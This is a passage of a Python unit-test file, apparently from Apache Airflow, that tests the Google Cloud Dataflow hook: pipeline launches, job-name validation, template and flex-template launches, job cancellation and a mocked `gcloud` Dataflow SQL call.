py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=py_requirements,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables['extra-package'] = ['a.whl', 'b.whl']
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=py_requirements,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
('python3',),
('python2',),
('python3',),
('python3.6',),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_custom_interpreter(
self, py_interpreter, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=py_interpreter,
py_requirements=None,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=py_interpreter,
py_options=PY_OPTIONS,
py_requirements=None,
py_system_site_packages=False,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@parameterized.expand(
[
(['foo-bar'], False),
(['foo-bar'], True),
([], True),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_python_dataflow_with_non_empty_py_requirements_and_without_system_packages(
self,
current_py_requirements,
current_py_system_site_packages,
mock_callback_on_job_id,
mock_dataflow_wait_for_done,
mock_uuid,
):
mock_beam_start_python_pipeline = self.dataflow_hook.beam_hook.start_python_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_PY)
expected_variables["job_name"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_python_pipeline.assert_called_once_with(
variables=expected_variables,
py_file=PY_FILE,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_options=PY_OPTIONS,
py_requirements=current_py_requirements,
py_system_site_packages=current_py_system_site_packages,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
def test_start_python_dataflow_with_empty_py_requirements_and_without_system_packages(
self, mock_dataflow_wait_for_done, mock_uuid
):
self.dataflow_hook.beam_hook = BeamHook(runner="DataflowRunner")
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"), self.assertRaisesRegex(
AirflowException, "Invalid method invocation."
):
self.dataflow_hook.start_python_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_PY,
dataflow=PY_FILE,
py_options=PY_OPTIONS,
py_interpreter=DEFAULT_PY_INTERPRETER,
py_requirements=[],
on_new_job_id_callback=on_new_job_id_callback,
)
mock_dataflow_wait_for_done.assert_not_called()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow(self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_multiple_values_in_variables(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['mock-option'] = ['a.whl', 'b.whl']
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(passed_variables)
expected_variables["jobName"] = job_name
expected_variables["region"] = DEFAULT_DATAFLOW_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=DEFAULT_DATAFLOW_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_variable(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
passed_variables: Dict[str, Any] = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
passed_variables['region'] = TEST_LOCATION
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=passed_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.wait_for_done'))
@mock.patch(DATAFLOW_STRING.format('process_line_and_extract_dataflow_job_id_callback'))
def test_start_java_dataflow_with_custom_region_as_parameter(
self, mock_callback_on_job_id, mock_dataflow_wait_for_done, mock_uuid
):
mock_beam_start_java_pipeline = self.dataflow_hook.beam_hook.start_java_pipeline
mock_uuid.return_value = MOCK_UUID
on_new_job_id_callback = MagicMock()
job_name = f"{JOB_NAME}-{MOCK_UUID_PREFIX}"
with self.assertWarnsRegex(DeprecationWarning, "This method is deprecated"):
self.dataflow_hook.start_java_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=DATAFLOW_VARIABLES_JAVA,
jar=JAR_FILE,
job_class=JOB_CLASS,
on_new_job_id_callback=on_new_job_id_callback,
location=TEST_LOCATION,
)
expected_variables = copy.deepcopy(DATAFLOW_VARIABLES_JAVA)
expected_variables["jobName"] = job_name
expected_variables["region"] = TEST_LOCATION
expected_variables["labels"] = '{"foo":"bar"}'
mock_callback_on_job_id.assert_called_once_with(on_new_job_id_callback)
mock_beam_start_java_pipeline.assert_called_once_with(
variables=expected_variables,
jar=JAR_FILE,
job_class=JOB_CLASS,
process_line_callback=mock_callback_on_job_id.return_value,
)
mock_dataflow_wait_for_done.assert_called_once_with(
job_id=mock.ANY, job_name=job_name, location=TEST_LOCATION, multiple_jobs=False
)
@parameterized.expand(
[
(JOB_NAME, JOB_NAME, False),
('test-example', 'test_example', False),
(f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}', JOB_NAME, True),
(f'test-example-{MOCK_UUID_PREFIX}', 'test_example', True),
('df-job-1', 'df-job-1', False),
('df-job', 'df-job', False),
('dfjob', 'dfjob', False),
('dfjob1', 'dfjob1', False),
]
)
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
def test_valid_dataflow_job_name(self, expected_result, job_name, append_job_name, mock_uuid4):
job_name = self.dataflow_hook.build_dataflow_job_name(
job_name=job_name, append_job_name=append_job_name
)
self.assertEqual(expected_result, job_name)
@parameterized.expand([("1dfjob@",), ("dfjob@",), ("df^jo",)])
def test_build_dataflow_job_name_with_invalid_value(self, job_name):
self.assertRaises(
ValueError, self.dataflow_hook.build_dataflow_job_name, job_name=job_name, append_job_name=False
)
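    # The two tests above imply the rule applied by build_dataflow_job_name (a
    # reading of the cases, not of the implementation itself): underscores in
    # the base name are mapped to dashes, the result must start with a letter
    # and contain only letters, digits and dashes, and append_job_name=True
    # suffixes the first 8 hex characters of a fresh UUID.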
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_get_job(self, mock_conn, mock_dataflowjob):
method_fetch_job_by_id = mock_dataflowjob.return_value.fetch_job_by_id
self.dataflow_hook.get_job(job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_metrics_by_id = mock_dataflowjob.return_value.fetch_job_metrics_by_id
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_metrics_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_metrics_by_id_controller(self, mock_conn):
method_get_metrics = (
mock_conn.return_value.projects.return_value.locations.return_value.jobs.return_value.getMetrics
)
self.dataflow_hook.fetch_job_metrics_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
method_get_metrics.return_value.execute.assert_called_once_with(num_retries=0)
method_get_metrics.assert_called_once_with(
jobId=TEST_JOB_ID, projectId=TEST_PROJECT_ID, location=TEST_LOCATION
)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_messages_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_messages_by_id = mock_dataflowjob.return_value.fetch_job_messages_by_id
self.dataflow_hook.fetch_job_messages_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_messages_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_fetch_job_autoscaling_events_by_id(self, mock_conn, mock_dataflowjob):
method_fetch_job_autoscaling_events_by_id = (
mock_dataflowjob.return_value.fetch_job_autoscaling_events_by_id
)
self.dataflow_hook.fetch_job_autoscaling_events_by_id(
job_id=TEST_JOB_ID, project_id=TEST_PROJECT_ID, location=TEST_LOCATION
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
location=TEST_LOCATION,
)
method_fetch_job_autoscaling_events_by_id.assert_called_once_with(TEST_JOB_ID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_wait_for_done(self, mock_conn, mock_dataflowjob):
method_wait_for_done = mock_dataflowjob.return_value.wait_for_done
self.dataflow_hook.wait_for_done(
job_name="JOB_NAME",
project_id=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
multiple_jobs=False,
)
mock_conn.assert_called_once()
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
name="JOB_NAME",
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
job_id=TEST_JOB_ID,
num_retries=self.dataflow_hook.num_retries,
multiple_jobs=False,
drain_pipeline=self.dataflow_hook.drain_pipeline,
cancel_timeout=self.dataflow_hook.cancel_timeout,
wait_until_finished=self.dataflow_hook.wait_until_finished,
)
method_wait_for_done.assert_called_once_with()
class TestDataflowTemplateHook(unittest.TestCase):
def setUp(self):
with mock.patch(BASE_STRING.format('GoogleBaseHook.__init__'), new=mock_init):
self.dataflow_hook = DataflowHook(gcp_conn_id='test')
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow(self, mock_conn, mock_controller, mock_uuid):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
variables = {'zone': 'us-central1-f', 'tempLocation': 'gs://test/temp'}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=copy.deepcopy(variables),
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={
'jobName': f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
'parameters': PARAMETERS,
'environment': variables,
},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id='test-job-id',
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_variable(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables={'region': TEST_LOCATION},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
projectId=TEST_PROJECT,
location=TEST_LOCATION,
gcsPath=TEST_TEMPLATE,
body=mock.ANY,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_custom_region_as_parameter(
self, mock_conn, mock_controller, mock_uuid
):
launch_method = (
mock_conn.return_value.projects.return_value.locations.return_value.templates.return_value.launch
)
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables={},
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
)
launch_method.assert_called_once_with(
body={'jobName': UNIQUE_JOB_NAME, 'parameters': PARAMETERS, 'environment': {}},
gcsPath='gs://dataflow-templates/wordcount/template_file',
projectId=TEST_PROJECT,
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
name=UNIQUE_JOB_NAME,
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
location=TEST_LOCATION,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_controller.return_value.wait_for_done.assert_called_once()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_with_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment={"numWorkers": 17},
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": RUNTIME_ENV}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('uuid.uuid4'), return_value=MOCK_UUID)
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_template_dataflow_update_runtime_env(self, mock_conn, mock_dataflowjob, mock_uuid):
options_with_runtime_env = copy.deepcopy(RUNTIME_ENV)
del options_with_runtime_env["numWorkers"]
runtime_env = {"numWorkers": 17}
expected_runtime_env = copy.deepcopy(RUNTIME_ENV)
expected_runtime_env.update(runtime_env)
dataflowjob_instance = mock_dataflowjob.return_value
dataflowjob_instance.wait_for_done.return_value = None
# fmt: off
method = (mock_conn.return_value
.projects.return_value
.locations.return_value
.templates.return_value
.launch)
# fmt: on
method.return_value.execute.return_value = {'job': {'id': TEST_JOB_ID}}
self.dataflow_hook.start_template_dataflow( # pylint: disable=no-value-for-parameter
job_name=JOB_NAME,
variables=options_with_runtime_env,
parameters=PARAMETERS,
dataflow_template=TEST_TEMPLATE,
project_id=TEST_PROJECT,
environment=runtime_env,
)
body = {"jobName": mock.ANY, "parameters": PARAMETERS, "environment": expected_runtime_env}
method.assert_called_once_with(
projectId=TEST_PROJECT,
location=DEFAULT_DATAFLOW_LOCATION,
gcsPath=TEST_TEMPLATE,
body=body,
)
mock_dataflowjob.assert_called_once_with(
dataflow=mock_conn.return_value,
job_id=TEST_JOB_ID,
location=DEFAULT_DATAFLOW_LOCATION,
name=f'test-dataflow-pipeline-{MOCK_UUID_PREFIX}',
num_retries=5,
poll_sleep=10,
project_number=TEST_PROJECT,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
mock_uuid.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_start_flex_template(self, mock_conn, mock_controller):
mock_locations = mock_conn.return_value.projects.return_value.locations
launch_method = mock_locations.return_value.flexTemplates.return_value.launch
launch_method.return_value.execute.return_value = {"job": {"id": TEST_JOB_ID}}
mock_controller.return_value.get_jobs.return_value = [{"id": TEST_JOB_ID}]
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_flex_template(
body={"launchParameter": TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
project_id=TEST_PROJECT_ID,
on_new_job_id_callback=on_new_job_id_callback,
)
on_new_job_id_callback.assert_called_once_with(TEST_JOB_ID)
launch_method.assert_called_once_with(
projectId='test-project-id',
body={'launchParameter': TEST_FLEX_PARAMETERS},
location=TEST_LOCATION,
)
mock_controller.assert_called_once_with(
dataflow=mock_conn.return_value,
project_number=TEST_PROJECT_ID,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=self.dataflow_hook.poll_sleep,
num_retries=self.dataflow_hook.num_retries,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
        mock_controller.return_value.wait_for_done.assert_called_once()
        mock_controller.return_value.get_jobs.assert_called_once()
assert result == {"id": TEST_JOB_ID}
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
def test_cancel_job(self, mock_get_conn, jobs_controller):
self.dataflow_hook.cancel_job(
job_name=UNIQUE_JOB_NAME, job_id=TEST_JOB_ID, project_id=TEST_PROJECT, location=TEST_LOCATION
)
jobs_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
name=UNIQUE_JOB_NAME,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
cancel_timeout=DEFAULT_CANCEL_TIMEOUT,
)
        jobs_controller.return_value.cancel.assert_called_once_with()
@mock.patch(DATAFLOW_STRING.format('_DataflowJobsController'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
    def test_start_sql_job(
self, mock_run, mock_get_conn, mock_provide_authorized_gcloud, mock_controller
):
test_job = {'id': "TEST_JOB_ID"}
mock_controller.return_value.get_jobs.return_value = [test_job]
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=0
)
on_new_job_id_callback = mock.MagicMock()
result = self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=on_new_job_id_callback,
)
mock_run.assert_called_once_with(
[
'gcloud',
'dataflow',
'sql',
'query',
TEST_SQL_QUERY,
'--project=test-project',
'--format=value(job.id)',
'--job-name=test-sql-job-name',
'--region=custom-location',
'--bigquery-project=test-project',
'--bigquery-dataset=test-dataset',
'--bigquery-table=beam_output',
'--bigquery-write-disposition=write-truncate',
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
mock_controller.assert_called_once_with(
dataflow=mock_get_conn.return_value,
job_id=TEST_JOB_ID,
location=TEST_LOCATION,
poll_sleep=10,
project_number=TEST_PROJECT,
num_retries=5,
drain_pipeline=False,
)
mock_controller.return_value.wait_for_done.assert_called_once()
assert result == test_job
@mock.patch(DATAFLOW_STRING.format('DataflowHook.get_conn'))
@mock.patch(DATAFLOW_STRING.format('DataflowHook.provide_authorized_gcloud'))
@mock.patch(DATAFLOW_STRING.format('subprocess.run'))
    def test_start_sql_job_failed_to_run(self, mock_run, mock_provide_authorized_gcloud, mock_get_conn):
mock_run.return_value = mock.MagicMock(
stdout=f"{TEST_JOB_ID}\n".encode(), stderr=f"{TEST_JOB_ID}\n".encode(), returncode=1
)
with pytest.raises(AirflowException):
self.dataflow_hook.start_sql_job(
job_name=TEST_SQL_JOB_NAME,
query=TEST_SQL_QUERY,
options=TEST_SQL_OPTIONS,
location=TEST_LOCATION,
project_id=TEST_PROJECT,
on_new_job_id_callback=mock.MagicMock(),
)
class TestDataflowJob(unittest.TestCase):
def setUp(self):
self.mock_dataflow = MagicMock()
def test_dataflow_job_init_with_job_id(self):
mock_jobs = MagicMock()
self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value = mock_jobs
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME, TEST_JOB_ID
).get_jobs()
mock_jobs.get.assert_called_once_with(
projectId=TEST_PROJECT, location=TEST_LOCATION, jobId=TEST_JOB_ID
)
def test_dataflow_job_init_without_job_id(self):
job = {"id": TEST_JOB_ID, "name": UNIQUE_JOB_NAME, "currentState": DataflowJobStatus.JOB_STATE_DONE}
mock_list = self.mock_dataflow.projects.return_value.locations.return_value.jobs.return_value.list
        mock_list.return_value.execute.return_value = {'jobs': [job]}
# fmt: off
(
self.mock_dataflow.projects.return_value.
locations.return_value.
jobs.return_value.
list_next.return_value
) = None
# fmt: on
_DataflowJobsController(
self.mock_dataflow, TEST_PROJECT, TEST_LOCATION, 10, UNIQUE_JOB_NAME
).get_jobs()
mock_list.assert_called_once_with(projectId=TEST_PROJECT, location=TEST_LOCATION)
def test_dataflow_job_wait_for_multiple_jobs(self):
job = {
"id": TEST_JOB_ID,
"name": UNIQUE_JOB_NAME,
